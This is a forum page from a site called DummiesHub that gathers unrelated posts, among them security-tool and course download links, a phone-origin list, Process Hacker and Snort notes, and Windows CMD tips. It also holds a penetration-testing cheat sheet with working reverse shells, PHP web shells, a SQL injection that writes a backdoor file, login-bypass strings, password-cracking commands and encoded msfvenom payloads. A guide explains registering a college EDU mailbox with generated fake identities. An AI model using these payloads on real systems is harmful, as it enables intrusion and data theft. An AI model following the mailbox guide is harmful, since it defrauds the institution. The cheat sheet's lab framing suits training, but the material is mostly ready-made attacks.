• DummiesHub believe in censorship free world
  • You will find here everything that can't find anywhere!
  • Sign Up Now!
Welcome, Guest
You have to register before you can post on our site.
Search Forums
Forum Statistics
 Members: 275
 Latest member: JSV Media
 Forum threads: 83
 Forum posts: 112

Full Statistics
Online Users
There are currently 18 online users.
 0 Member(s) | 17 Guest(s)
Google

Burp Bounty - Scan Check Builder

This Burp Suite extension allows you, in a quick and simple way, to improve the active and passive burpsuite scanner by means of personalized rules through a very intuitive graphical interface. Through an advanced search of patterns and an improvement of the payload to send, we can create our own issue profiles both in the active scanner and in the passive.

Download releases: https://github.com/wagiro/BurpBounty/rel...ounty_v3.6


this is a play list to learn more about this Extension

load these profiles : https://github.com/wagiro/BurpBounty/tre.../profiles/

Also check :
https://securityonline.info/burp-bounty-...e-scanner/

Attify's (Pentester Academy) Android Pentesting Course 

Download :

https://drive.google.com/drive/folders/1...x_VpOChzZc

Lynda Android Malware Analysis

Topics include:
Installing the analysis tools on Mac and Windows
Viewing app resources
Decompiling applications
Analyzing permissions
Spyware types
Exfiltrated data, C2 servers, and strings

 Source :

https://www.lynda.com/Android-tutorials/...563-2.html


Download :

https://mega.nz/folder/CoJhAQTQ#AmEegH_cQGefqrIBXoWU0w

Boycotting china is not supported by Dummieshub, but some members were constantly asking for choosing non chinese smartphones. If I missed some company you can add a comment i will update the list and Thanks in advance.
Some of Apple’s production happens in India as well."Outside China, India is the only country where manufacturing both Moto and Lenovo phones are going on. So you should ask apple store for made in india products.

  • JIO - Indian
  • Apple – American
  • Microsoft Mobile - American
  • Samsung Mobile – South Korean
  • Nokia Mobile – Finnish
  • Google Pixel – American
  • Sony Mobile – Japanese
  • LG – South Korean
  • BLU Products – American
  • lava – Indian
  • Sharp – Japanese
  • Fairphone – Dutch
  • Philips Mobile – Dutch
  • Yotaphone – Russian
  • BQ – Spanish
  • Acer – Taiwanese
  • Asus – Taiwanese
  • HTC – Taiwanese
  • Iball - Indian
  • Xolo - Indian

Based on above list here are some non chinese smartphones:
  • ASUS ROG Phone II (Taiwan)
  • LG G8X ThinQ (South Korea)
  • LG Stylo 5 (South Korea)
  • LG V60 ThinQ (South Korea)
  • Moto G Stylus (India)
  • Samsung Galaxy Z Flip (South Korea)
  • Samsung Galaxy Note 10/10 Plus (South Korea)
  • Samsung Galaxy S10 series (South Korea)
  • Samsung Galaxy S20 series (South Korea)
  • Sony Xperia 1 II (Japan)

Madison Community College EDU-mail application, desktop version with office365 second batch of Madison Area Technical College
2018-08-27 Reading (7355) Category: Education Offers


School Profile
Madison District Technical College ( Madison College ) It serves some students from 12 counties in central and southern Wisconsin: Adams, Columbia, Dane, Dodge, Green, Iowa, Jefferson, Juneau, Marquette, Ridge Lan, Locke and Sauk. The campus location includes several districts throughout Madison City and four districts in the city Ritzburg, Watertown, Atkinson Castle and Portage.

It is the largest of the 16 schools in the Wisconsin Institute of Technology system, serving 5,392 full-time and 10,747 part-time students in 2012.

Application email
Application address: https://my.madisoncollege.edu/app/profile/search

American Information Acquisition Address: Virtual Identity / Credit Card Generation

Enter the date of birth and name first, then search



The system will prompt that the existing account cannot be found. If you think you have an account, please modify your search or call 608-246-6210. Otherwise create an account.

Click create account to create a new account, fill in the content with * as required ( note that there is a Google verification code, a ladder is required, and you will solve it yourself )





After completing the information, click Continue, and then fill in the account password and account security questions and answers (the account password is the login password of the EDU mailbox, do not fill in at random and cause the password to be forgotten)



After filling in, click Create Account to apply for an account, at this time you can see the student number and user name

Email address is your [email protected]

The password is the password set when creating the account above. Finally, go to outlook.office.com to log in to your mailbox. The mailbox is hosted in office365 and supports the installation of the desktop version of office365.

Precautions
For newly registered EDU mailboxes, you need to wait 1 to 2 hours before logging in, otherwise you will be prompted to find the tenant or log in the next day after applying.
[align=start][font][font]Madison District Technical College[/font][font][font] ( [/font][/font][font][font]Madison College[/font][/font][font][font] ) It serves some students from 12 counties in central and southern Wisconsin: Adams, Columbia, Dane, Dodge, Green, Iowa, Jefferson, Juneau, Marquette, Ridge Lan, Locke and Sauk. [/font][font]The campus location includes several districts throughout Madison City and four districts in the city Ritzburg, Watertown, Atkinson Castle and Portage.[/font][/font][/font][/align]
[align=start][font][font]It is the largest of the 16 schools in the Wisconsin Institute of Technology system, serving 5,392 full-time and 10,747 part-time students in 2012.[/font][/font][/align]
[font][font]Application email[/font][/font]
[align=start][font][font]Application address:  [/font][font][font]https://my.madisoncollege.edu/app/profile/search[/font][/font][/font][/align]
[align=start][font][font]American Information Acquisition Address:  [/font][font][font]Virtual Identity / Credit Card Generation[/font][/font][/font][/align]
[align=start][font][font]Enter the date of birth and name first, then search[/font][/font][/align]
[align=start][Image: TB16VmOKf5TBuNjSspcXXbnGFXa_640x640][/align]
[align=start][font][font]The system will prompt that the existing account cannot be found. [font]If you think you have an account, please modify your search or call 608-246-6210. [/font][font]Otherwise create an account.[/font][/font][/font][/align]
[align=start][font][font]Click create account to create a new account, fill in the content with * as required ( [/font][font][font]note that there is a Google verification code, a ladder is required, and you will solve it yourself[/font][/font][font][font] )[/font][/font][/font][/align]
[align=start][Image: 005GPZiSgy1fuo4mavgg5j30x10pgabp.jpg][/align]
[align=start] [/align]
[align=start][font][font]After completing the information, click Continue, and then fill in the account password and account security questions and answers (the account password is the login password of the EDU mailbox, do not fill in at random and cause the password to be forgotten)[/font][/font][/align]
[align=start][Image: 005GPZiSly1fuo571e1arj30wr0heta5.jpg][/align]
[align=start][font][font]After filling in, click Create Account to apply for an account, at this time you can see the student number and user name[/font][/font][/align]
[align=start][font][font]Email address is your [/font][font][font][email protected][/font][/font][/font][/align]
[align=start][font][font]The password is the password set when creating the account above. [font]Finally, go to outlook.office.com to log in to your mailbox. The mailbox is hosted in office365 and supports the installation of the desktop version of office365.[/font][/font][/font][/align]
[font][font]Precautions[/font][/font]
[align=start][font][font]For newly registered EDU mailboxes, you need to wait 1 to 2 hours before logging in, otherwise you will be prompted to find the tenant or log in the next day after applying.[/font][/font][/align]

A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware. "
 
Process Hacker- this is a professional set of OS management tools working with the kernel through the Native API (kernel API) designed to manage processes and their flows, control computer memory usage, disk and network activity, manage state and parameters, install and uninstall services and drivers, can release blocked by others processes, to be used as a kernel level debugger and to search for some types of rootkits and other hidden processes, to delete suspended or protected processes that cannot be deleted by other tools (some of its features may not be available due to OS limitations or insufficient user privileges).
 
Note  [?]
 
Current stable version : v2.39 dated 03/29/2016
In development: v3.00 , we look at source codes on GitHub .

Note: source codes in the repository do not include all patches! Look for custom patches in a forum, topic, or on Git. Their use is entirely at your discretion and risk!
 
Downloads :
 
1.xx (MS .NET Framework 2.x is required for work) | 2.xx :   Setup (EXE) | Portable (Zip) | Source (Zip) | SDK (Zip) | Debugging Tools for Windows - link to the MSDN page for downloading the necessary kernel level debugger engine built into the program. About the system dbghelp.dll  [?] .
 
Test builds :
 
Development build  [?]
.

  • Official Nightly Builds - installer, Zip, SDK, sources. They are collected automatically after a new commit appears on GitHub in the master branch and they do not include Plugins-Extra [sup]*[/sup] (experimentally may include their 32-bit editions), the server may not have the latest version.
     
    System requirements :
     
    RAM : ~ 30Mb of memory  [?]
    CPU : up to 64 processors  [?]
     
    The minimum version of the operating system depends on the version of Process Hacker :
     
    3.xx - Windows 7 / Server 2008 R2 and higher, 32/64-bit edition ,
    2.39- Windows Vista / Server 2008, 32/64-bit editions, operations using the kernel level driver are available in Windows 7 and higher
    2.xx - up to v2.38 inclusive - Windows XP SP2 / 2003 and higher, 32/64-bit editions,
    1.xx - Windows 2000 and higher, requires MS .NET Framework v2.0, only 32-bit
     

  • IMPORTANT!
     
    To switch Process Hacker to " Portable mode " (the settings are stored in the Process Hacker directory) before its first launch, next to ProcessHacker.exe, we create the ProcessHacker.exe.settings.xml and usernotesdb.xml files .
     
     
    ATTENTION! Be sure to carefully read the documentation that is on the site and in the archives with the distribution! The program was originally created for professionals, and therefore requires a fairly high level of knowledge from the user!
     


ERROR: Invalid argument: preprocessor Fatal Error, Quitting.. can be solved by ommiting extra \ 

Code:
 
# SSH anomaly detection.  For more information, see README.ssh
preprocessor ssh: server_ports { 22 } \
                  autodetect \
                  max_client_bytes 19600 \
                  max_encrypted_packets 20 \

so that it looks like 
Code:
# SSH anomaly detection.  For more information, see README.ssh
preprocessor ssh: server_ports { 22 } \
                  autodetect \
                  max_client_bytes 19600 \
                  max_encrypted_packets 20
The next error i encountered was "Snort\rules\white_list.rules, Error: No such file or directory
Fatal Error, Quitting..". To solve this issue create a file called white_list.rules & blacklist.rules if they don't exist.
 
Code:
   whitelist $WHITE_LIST_PATH\white_list.rules, \
   blacklist $BLACK_LIST_PATH\blacklist.rules 

For those who don't know what is snort:
Snort is a free open source network intrusion detection system and intrusion prevention system. If you want to know more about snort just leave a comment.

Free Cyber Security Courses and Training Material
[Image: pixel.png]Cloud Security

Industrial Controls  Firewall & Network Security Vulnerability Assessment Penetration Testing Linux Endpoint Protection Digital Forensics Other CyberSecurity Courses

Enumeration
Enumeration is the most important thing you can do, where you find
yourself hitting a wall, 90% of the time it will be because you haven’t
done enough enumeration.
Below are commands which are helpful while you are in the lab:
Nmap
Quick TCP Scan

Code:
nmap -sC -sV -vv -oA quick target
Quick UDP Scan
Code:
nmap -sU -sV -vv -oA quick_udp target
Full TCP Scan
Code:
nmap -sC -sV -p- -vv -oA full target
Port knock
Code:
for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-
retries 0 -p $x target; done
Web Scanning
Gobuster quick directory busting
Code:
gobuster -u target -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux

Gobuster search with file extension
Code:
gobuster -u target -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
Nikto web server scan
Code:
nikto -h target
Wordpress scan
Code:
wpscan -u target/wp/
Port Checking
Netcat banner grab
Code:
nc -v target port
Telnet banner grab
Code:
telnet target port
SMB
SMB Vulnerability Scan
Code:
nmap -p 445 -vv --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse target
SMB Users & Shares Scan
Code:
nmap -p 445 -vv --script=smb-enum-shares.nse,smb-enum-users.nse target
Enum4linux
Code:
enum4linux -a target
Null connect
Code:
rpcclient -U "" target
Connect to SMB share
Code:
smbclient //MOUNT/share
SNMP
SNMP enumeration
Code:
snmp-check target
Reverse Shells
Bash shell
Code:
bash -i >& /dev/tcp/target/4443 0>&1
Netcat Linux
Code:
nc -e /bin/sh target 4443
Netcat Windows
Code:
nc -e cmd.exe target 4443
Python
Code:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("target",4443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Perl
Code:
perl -e 'use
Socket;$i="target";$p=4443;socket(S,PF_INET,SOCK_STREAM,getproto
byname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN
,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Remote Desktop
Remote Desktop for windows with share and 85% screen
Code:
rdesktop -u username -p password -g 85% -r disk:share=/root/ target
PHP
PHP command injection from GET Request
Code:
<?php echo system($_GET["cmd"]);?>
#Alternative
Code:
<?php echo shell_exec($_GET["cmd"]);?>
Powershell
Non-interactive execute powershell file
Code:
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -
NoProfile -File file.ps1
SSH Tunneling / Pivoting
shuttle
sshuttle -vvr [email protected] 10.1.1.0/24
Local port forwarding
ssh <gateway> -L <local port to listen>:<remote host>:<remote port>
Remote port forwarding
ssh <gateway> -R <remote port to bind>:<local host>:<local port>
Dynamic port forwarding
ssh -D <local proxy port> -p <remote port> <target>
Plink local port forwarding
plink -l root -pw pass -R 3389:<localhost>:3389 <remote host>
SQL Injection
# sqlmap crawl
sqlmap -u http://target --crawl=1
# sqlmap dump database
sqlmap -u http://target --dbms=mysql --dump
# sqlmap shell
sqlmap -u http://target --dbms=mysql --os-shell
Upload php command injection file
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into
OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
Load file
union all select
1,2,3,4,load_file("c:/windows/system32/drivers/etc/hosts"),6
Bypasses
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -
Brute force
John the Ripper shadow file
$ unshadow passwd shadow > unshadow.db
$ john unshadow.db
# Hashcat SHA512 $6$ shadow file
hashcat -m 1800 -a 0 hash.txt rockyou.txt --username
#Hashcat MD5 $1$ shadow file
hashcat -m 500 -a 0 hash.txt rockyou.txt --username
# Hashcat MD5 Apache webdav file
hashcat -m 1600 -a 0 hash.txt rockyou.txt
# Hashcat SHA1
hashcat -m 100 -a 0 hash.txt rockyou.txt --force
# Hashcat Wordpress
hashcat -m 400 -a 0 --remove hash.txt rockyou.txt
RDP user with password list
ncrack -vv --user offsec -P passwords rdp://target
SSH user with password list
hydra -l user -P pass.txt -t 10 target ssh -s 22
FTP user with password list
medusa -h target -u user -P passwords.txt -M ftp
MSFVenom Payloads
# PHP reverse shell
msfvenom -p php/meterpreter/reverse_tcp LHOST=target
LPORT=4443 -f raw -o shell.php
# Java WAR reverse shell
msfvenom -p java/shell_reverse_tcp LHOST=target LPORT=4443 -f war
-o shell.war
# Linux bind shell
msfvenom -p linux/x86/shell_bind_tcp LPORT=4443 -f c -b
"\x00\x0a\x0d\x20" -e x86/shikata_ga_nai
# Linux FreeBSD reverse shell
msfvenom -p bsd/x64/shell_reverse_tcp LHOST=target LPORT=4443 -
f elf -o shell.elf
# Linux C reverse shell
msfvenom -p linux/x86/shell_reverse_tcp LHOST=target
LPORT=4443 -e x86/shikata_ga_nai -f c
# Windows non staged reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -
e x86/shikata_ga_nai -f exe -o non_staged.exe
# Windows Staged (Meterpreter) reverse shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=target
LPORT=4443 -e x86/shikata_ga_nai -f exe -o meterpreter.exe
# Windows Python reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443
EXITFUNC=thread -f python -o shell.py
# Windows ASP reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -
f asp -e x86/shikata_ga_nai -o shell.asp
# Windows ASPX reverse shell
msfvenom -f aspx -p windows/shell_reverse_tcp LHOST=target
LPORT=4443 -e x86/shikata_ga_nai -o shell.aspx
# Windows JavaScript reverse shell with nops
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -
f js_le -e generic/none -n 18
# Windows Powershell reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -
e x86/shikata_ga_nai -i 9 -f psh -o shell.ps1
# Windows reverse shell excluding bad characters
msfvenom -p windows/shell_reverse_tcp -a x86 LHOST=target
LPORT=4443 EXITFUNC=thread -f c -b "\x00\x04" -e
x86/shikata_ga_nai
# Windows x64 bit reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=target
LPORT=4443 -f exe -o shell.exe
# Windows reverse shell embedded into plink
msfvenom -p windows/shell_reverse_tcp LHOST=target LPORT=4443 -
f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-
binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
Interactive Shell
Upgrading to a fully interactive TTY using Python
# Enter while in reverse shell
$ python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
# In Kali
$ stty raw -echo
$ fg
# In reverse shell
$ reset
$ export SHELL=bash
$ export TERM=xterm-256color
$ stty rows <num> columns <cols>

File Transfers
HTTP
The most common file transfer method.
# In Kali
python -m SimpleHTTPServer 80
# In reverse shell - Linux
wget target/file
# In reverse shell - Windows
powershell -c "(new-object
System.Net.WebClient).DownloadFile('http://target/file.exe','C:\Users\
user\Desktop\file.exe')"
FTP
This process can be mundane, a quick tip would be to be to name the
filename as ‘file’ on your kali machine so that you don’t have to re-write
the script multiple names, you can then rename the file on windows.
# In Kali
python -m pyftpdlib -p 21 -w
# In reverse shell
echo open target > ftp.txt
echo USER anonymous >> ftp.txt
echo ftp >> ftp.txt
echo bin >> ftp.txt
echo GET file >> ftp.txt
echo bye >> ftp.txt

# Execute
ftp -v -n -s:ftp.txt
TFTP
Generic.
# In Kali
atftpd --daemon --port 69 /tftp
# In reverse shell
tftp -i target GET nc.exe

Microsoft has cleverly placed Command Line next to the default Windows interface. Although CMD is considered an old, relatively unnecessary text-based tool, it's still not without reason for Microsoft to do so.

However, there are still CMD commands that are still in use, even with new features added to Windows 8. In this article, we'll look at some of the commands you'll need as a Windows user.

ASSOC

Most files in Windows are associated with a specific software, meaning that for each file type, a software is assigned to run the files by default. Sometimes remembering these connections can be a little confusing. As a reminder, you can use the "assoc" command to display a complete list of the types of files and software associated with it.

You can also use this command to change the software associated with a particular format. For example, by using the phrase “assoc.txt =” you can change the software for opening text files to a custom software that you enter after the equal sign. The ASSOC command also specifies both the file format name and the software name, which will help you use it correctly.

Cipher

Deleting files on the hard drive will not completely erase them. Instead, the files will be inaccessible and the space they occupy will be shown to you as free space. These files can be recovered as long as they are replaced with new data.
However, the Cipher command can clear it by writing random data on a specific path, that is, it will completely erase the files that you deleted but are still on disk. For example, to clean the C drive, you can use the "cipher / w: c" command. This command does not apply to deleted files, so your essential files will not be deleted using this command.

 

Driverquery

Drivers are one of the most important software installed on a PC. Improper configuration or removal can cause a variety of problems, so it would be great if we could access the list of all drivers installed on the PC. This is exactly what the driverquery command does for you. You can also expand this command to "driverquery -v" to show you more information, such as the driver installation path.

File Compare

This command can be used to identify differences between two text files and will be very useful for writers and programmers who want to make small changes between two different versions of a file. To use, type "fc" and then enter the path and name of the files you want to compare.

 

You can also expand this command in different ways. Using "/ b", only binary outputs are compared. Using “\ c”, the type of text is overlooked in comparison, and using “/ l”, only ASCII texts are compared in two posts.

 

So, for example, by writing the following command, ASCII texts will be compared in two posts with the specified addresses:

“Fc / l“ C: \ Program Files ( x86 ) \ example1. doc ”“ C: \ Program Files ( x86 ) \ example2. doc ”  
 

 

Ipconfig

This command will display the current IP address that the computer is using. However, if your computer is connected to a router (like most current computers), you will receive a local router network address instead.

 

However, ipconfig can still be useful. Using the "ipconfig / release" command after the "ipconfig / renew" command can force Windows to request a new IP. You can also use the "ipconfig / flushdns" command to refresh your DNS address.

 

Netstat
Entering the "netstat -an" command will show you a list of open ports and their IP Addresses.
You can also see what position the port is in: Listening, Established, or Closed. You can use this command to identify devices that are connected to a PC. You can also use this command to specify suspicious connections if you suspect viruses or trojans.

 

Ping

Sometimes you need to know whether data packets are exchanged between a specific device on the network or not. This is where ping can be useful. By typing "ping" and then an IP address or Web Domain, a number of data packets are sent experimentally to the specified address. If the data reaches that address and then returns, you can see that the device is communicating properly with your PC, but if this sending and receiving is not successful, it becomes clear that something is preventing the connection between your device and your computer.

Pathping
This command is a more advanced version of the Ping command. This command will be useful when there are multiple routers between your PC and the device you want to test. Like Ping, you can use this command by typing "pathping" and then the IP address you want. Routing also gives you more information about the route and data transmission.

 

Tracert

The "tracert" command is similar to pathping. To use, enter the phrase "tracert" and then the IP address or domain you want to track. It will then display complete information about each step taken (such as passing routers) on the path between your PC and the destination. Also, the tracert command measures the amount of jump time between different servers or devices (in milliseconds).

Powercfg
Powercfg is a very powerful command that you can use to track and manage how your computer uses energy. You can manage Hibernate operations by entering "powercfg / hibernate on" and "powercfg / hibernate off". With “powercfg / a” you can see the different energy storage modes on your PC.

 

Another application is "powercfg / devicequery s1_supported", which displays a list of devices connected to a computer that have the ability to standby while connected (Connected Standby).
The "powercfg / lastwake" command indicates which device last took your PC out of Sleep mode.

You can also use the "powercfg / energy" command to create an accurate report of your PC's power consumption. The path to save this report is displayed after the operation.
In Windows 8, a new extension has been added for this command. By entering the command "powercfg / batteryreport", you will be given a detailed analysis of battery consumption. The output of this analysis, which is normally stored in the Windows User path, includes information about the time and amount of charge and discharge cycles, average battery life, and battery capacity estimation.

 

Shutdown
in Windows 8 and 8.1 There is now a Shutdown command that turns off the computer as its name implies. Of course, you might think that despite the Shutdown button, which is easily accessible, this is an additional command. But don't forget that by typing "shutdown / r / o", your computer will restart, and after restarting, the Advanced Start Options menu will appear, where you can access Safe Mode and Windows Recovery tools.

 

System File Checker
System File Checker is an automated scanning and repair tool that focuses on Windows system files. To use this command, you must first run CMD under Administrator and then enter the command "sfc / scannow". If a corrupted or lost file is detected in the scan, it will be automatically replaced with previous, healthier copies of the same file that is stored by Windows for this purpose.

Recovery Image

Most computers running Windows 8 or 8.1 come with a Recovery Image from the factory, but that Image may have Bloatware, so you don't want to use it again. After uninstalling it, you can create another image using the "recimg" command. Remember that you must run CMD under Administrator to use this command. By entering this command, a complete description of how to use it is displayed.

Tasklist

The tasklist command can show you a list of all the tasks running on your PC at that moment. Of course, with Task Manager, this command may seem a bit extra, but sometimes it shows Tasks that are hidden in the Task Manager and are not displayed.

The "tasklist-svc" command displays the services for each task, and the "tasklist -v" command provides you with more details about each task. You can also use the tasklist -m command to identify dll files associated with active tasks.

 

Taskkill
Tasks that are displayed using the "tasklist" command have an executable file and a Process ID (a 4-digit number) associated with them. You can prevent a program from running and close it by entering the "taskkill -im" command, followed by the name of the executable file, or the "taskkill -pid" command, followed by the desired Process ID number. Again, with Task Manager, this section may not be very useful, but you may be able to use it to close some running applications.

The conclusion of this article does not cover all existing CMD commands. In fact, if we consider their variables, we can say that there are hundreds of different commands, most of which are no longer useful, because they have been replaced by different menus and options in the Windows user interface (GUI), or they are not very useful

  • 1(current)
  • 2
  • 3
  • 4
  • 5
  • 9